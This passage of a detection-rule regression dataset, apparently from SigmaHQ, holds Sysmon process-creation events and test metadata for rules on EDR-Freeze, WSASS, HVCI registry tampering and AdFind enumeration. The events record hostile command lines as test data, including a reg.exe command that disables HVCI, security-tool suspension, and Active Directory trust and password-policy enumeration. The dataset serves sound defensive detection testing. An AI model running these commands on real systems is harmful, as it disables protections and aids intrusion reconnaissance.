\"2025-11-27 08:12:45.093\",\n      \"ProcessGuid\": \"0197231E-07FD-6928-290C-000000000D00\",\n      \"ProcessId\": 9388,\n      \"Image\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\EDRFreeze-gnu.exe\",\n      \"FileVersion\": \"-\",\n      \"Description\": \"-\",\n      \"Product\": \"-\",\n      \"Company\": \"-\",\n      \"OriginalFileName\": \"-\",\n      \"CommandLine\": \"EDRFreeze-gnu.exe  3472 10000\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-B736-6923-B25C-3B0000000000\",\n      \"LogonId\": \"0x3b5cb2\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=67582B0B646E9E23846A8A9D9E412DCFABC0CCA0,MD5=A3BE334229BEBE056335780502747595,SHA256=0502C36D1F146A6B6BE31F7D7D65FEEF96A3FB3F3743DFFC38BB47AE426849F3,IMPHASH=AB8BB31EDD91D2A05FE7B62A535E9EB7\",\n      \"ParentProcessGuid\": \"0197231E-CC5A-6927-B80A-000000000D00\",\n      \"ParentProcessId\": 4952,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/info.yml",
    "content": "id: f668b689-59c5-41a7-bc0b-22168d3df14e\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: c598cc0c-9e70-4852-b9eb-8921af79f598\n      title: Hacktool - EDR-Freeze Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/c598cc0c-9e70-4852-b9eb-8921af79f598.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/589ac73f-8e12-409c-964e-31a2f5775ae2.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T07:57:32.087108Z\"\n        }\n      },\n      \"EventRecordID\": 676334,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 07:57:32.080\",\n      \"ProcessGuid\": \"0197231E-046C-6928-150C-000000000D00\",\n      \"ProcessId\": 7088,\n      \"Image\": \"C:\\\\Users\\\\Public\\\\wsass\\\\WSASS.exe\",\n      \"FileVersion\": \"-\",\n      \"Description\": \"-\",\n      \"Product\": \"-\",\n      \"Company\": \"-\",\n      \"OriginalFileName\": \"-\",\n      \"CommandLine\": \"WSASS.exe  WerFaultSecure.exe 860\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Public\\\\wsass\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-B736-6923-B25C-3B0000000000\",\n      \"LogonId\": \"0x3b5cb2\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=63AF15DCCB5CA8704918B7A8BFD0308726B2D7FD,MD5=D7A969E5A3636BF8FC9CA8A72021BFDC,SHA256=0977C9337EC1215C48A666464AFDA5C9A30CD24999A5F8E821E672991864A74C,IMPHASH=32F5095C9BBDCACF28FD4060EB4DFC42\",\n      \"ParentProcessGuid\": \"0197231E-0250-6928-D30B-000000000D00\",\n      \"ParentProcessId\": 11640,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/info.yml",
    "content": "id: e3ffac4e-8507-43f9-9542-4c9f10f49d3a\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 589ac73f-8e12-409c-964e-31a2f5775ae2\n      title: HackTool - WSASS Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/589ac73f-8e12-409c-964e-31a2f5775ae2.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/6225c53a-a96e-4235-b28f-8d7997cd96eb.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-23T02:25:20.222853Z\"\n        }\n      },\n      \"EventRecordID\": 90965,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3320,\n          \"ThreadID\": 4216\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-23 02:25:20.191\",\n      \"ProcessGuid\": \"0197231E-FD90-6949-5110-000000000D00\",\n      \"ProcessId\": 10104,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.26100.5074 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"reg.exe  add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\DeviceGuard\\\\Scenarios\\\\HypervisorEnforcedCodeIntegrity\\\" /v \\\"Enabled\\\" /t REG_DWORD /d 0 /f\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\Sysmon\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-5032-6940-AAE2-070000000000\",\n      \"LogonId\": \"0x7e2aa\",\n    
  \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0\",\n      \"ParentProcessGuid\": \"0197231E-FB8C-6949-2310-000000000D00\",\n      \"ParentProcessId\": 22176,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/info.yml",
    "content": "id: 7c72394d-cb39-4d53-836a-ebc524ee1685\ndescription: N/A\ndate: 2025-12-23\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 6225c53a-a96e-4235-b28f-8d7997cd96eb\n      title: Hypervisor-protected Code Integrity (HVCI) Related Registry Tampering Via CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/6225c53a-a96e-4235-b28f-8d7997cd96eb.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T09:37:40.974119Z\"\n        }\n      },\n      \"EventRecordID\": 650014,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 09:37:40.972\",\n      \"ProcessGuid\": \"14207D89-F764-68F9-2410-000000003F02\",\n      \"ProcessId\": 4316,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\AdFind.exe\",\n      \"FileVersion\": \"1.62.0.6172\",\n      \"Description\": \"-\",\n      \"Product\": \"AdFind\",\n      \"Company\": \"www.joeware.net\",\n      \"OriginalFileName\": \"AdFind.exe\",\n      \"CommandLine\": \"AdFind.exe   -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      
\"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201\",\n      \"ParentProcessGuid\": \"14207D89-F57C-68F9-D70F-000000003F02\",\n      \"ParentProcessId\": 6488,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml",
    "content": "id: de5c7702-3eb3-41be-ae33-b36a6f13d985\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b\n      title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T09:30:03.278177Z\"\n        }\n      },\n      \"EventRecordID\": 649847,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 09:30:03.253\",\n      \"ProcessGuid\": \"14207D89-F59B-68F9-DB0F-000000003F02\",\n      \"ProcessId\": 6504,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\AdFind.exe\",\n      \"FileVersion\": \"1.62.0.6172\",\n      \"Description\": \"-\",\n      \"Product\": \"AdFind\",\n      \"Company\": \"www.joeware.net\",\n      \"OriginalFileName\": \"AdFind.exe\",\n      \"CommandLine\": \"AdFind.exe  -f (objectcategory=person)\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201\",\n      \"ParentProcessGuid\": \"14207D89-F57C-68F9-D70F-000000003F02\",\n      \"ParentProcessId\": 6488,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml",
    "content": "id: c02bbff9-3d3b-4b4b-a6f5-8c2f4cbb60ad\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 514e7e3e-b3b4-4a67-af60-be20f139198b\n      title: PUA - AdFind.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T11:32:08.872401Z\"\n        }\n      },\n      \"EventRecordID\": 651803,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 11:32:08.871\",\n      \"ProcessGuid\": \"14207D89-1238-68FA-4A13-000000003F02\",\n      \"ProcessId\": 8080,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\AdFind.exe\",\n      \"FileVersion\": \"1.62.0.6172\",\n      \"Description\": \"-\",\n      \"Product\": \"AdFind\",\n      \"Company\": \"www.joeware.net\",\n      \"OriginalFileName\": \"AdFind.exe\",\n      \"CommandLine\": \"AdFind.exe  -s trustdmp\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201\",\n      \"ParentProcessGuid\": \"14207D89-1136-68FA-2D13-000000003F02\",\n      \"ParentProcessId\": 1648,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml",
    "content": "id: 5a7dd11d-3b65-49b3-ac81-a9f855742bbc\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 9a132afa-654e-11eb-ae93-0242ac130002\n      title: PUA - AdFind Suspicious Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T10:01:48.031627Z\"\n        }\n      },\n      \"EventRecordID\": 650317,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 10:01:48.012\",\n      \"ProcessGuid\": \"14207D89-FD0C-68F9-D610-000000003F02\",\n      \"ProcessId\": 2064,\n      \"Image\": \"C:\\\\Program Files (x86)\\\\Advanced IP Scanner\\\\advanced_ip_scanner.exe\",\n      \"FileVersion\": \"2.5.4594.1\",\n      \"Description\": \"Advanced IP Scanner\",\n      \"Product\": \"Advanced IP Scanner\",\n      \"Company\": \"Famatech Corp.\",\n      \"OriginalFileName\": \"advanced_ip_scanner.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files (x86)\\\\Advanced IP Scanner\\\\advanced_ip_scanner.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Program Files (x86)\\\\Advanced IP Scanner\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": 
\"Medium\",\n      \"Hashes\": \"MD5=B3411927CC7CD05E02BA64B2A789BBDE,SHA256=4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5,IMPHASH=B7378C9136E7511821BFD495ADBE3CB0\",\n      \"ParentProcessGuid\": \"14207D89-FCFD-68F9-D010-000000003F02\",\n      \"ParentProcessId\": 3240,\n      \"ParentImage\": \"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-F5HMR.tmp\\\\Advanced_IP_Scanner_2.5.4594.1.tmp\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-F5HMR.tmp\\\\Advanced_IP_Scanner_2.5.4594.1.tmp\\\" /SL5=\\\"$E0218,20439558,139776,C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml",
    "content": "id: 6629d68a-c1b8-4eb8-bfa6-7dbd5018d922\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f\n      title: PUA - Advanced IP Scanner Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T10:11:05.435406Z\"\n        }\n      },\n      \"EventRecordID\": 650602,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 10:11:05.414\",\n      \"ProcessGuid\": \"14207D89-FF39-68F9-1A11-000000003F02\",\n      \"ProcessId\": 7316,\n      \"Image\": \"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\Advanced Port Scanner 2\\\\advanced_port_scanner.exe\",\n      \"FileVersion\": \"-\",\n      \"Description\": \"Advanced Port Scanner\",\n      \"Product\": \"Advanced Port Scanner\",\n      \"Company\": \"Famatech Corp.\",\n      \"OriginalFileName\": \"advanced_port_scanner.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\Advanced Port Scanner 2\\\\advanced_port_scanner.exe\\\" /portable \\\"C:/Users/SwachchhandaP/Downloads/\\\" /lng en_us\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\Advanced Port Scanner 2\\\\\",\n      \"User\": 
\"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=4FDABE571B66CEEC3448939BFB3FFCD1,SHA256=8B9C7D2554FE315199FAE656448DC193ACCBEC162D4AFFF3F204CE2346507A8A,IMPHASH=31E3E9D3DDE3C0C0F2C167B89B8E269C\",\n      \"ParentProcessGuid\": \"14207D89-FF2E-68F9-1911-000000003F02\",\n      \"ParentProcessId\": 3972,\n      \"ParentImage\": \"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-90PLO.tmp\\\\Advanced_Port_Scanner_2.5.3869.tmp\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-90PLO.tmp\\\\Advanced_Port_Scanner_2.5.3869.tmp\\\" /SL5=\\\"$E0634,19769177,139776,C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\Advanced_Port_Scanner_2.5.3869.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml",
    "content": "id: 998b5845-1623-4b2f-b9d1-bfc402172d45\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 54773c5f-f1cc-4703-9126-2f797d96a69d\n      title: PUA - Advanced Port Scanner Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T10:24:32.948699Z\"\n        }\n      },\n      \"EventRecordID\": 650887,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 10:24:32.936\",\n      \"ProcessGuid\": \"14207D89-0260-68FA-9511-000000003F02\",\n      \"ProcessId\": 4220,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\advancedrun-x64\\\\AdvancedRun.exe\",\n      \"FileVersion\": \"1.51\",\n      \"Description\": \"Run a program with different settings that you 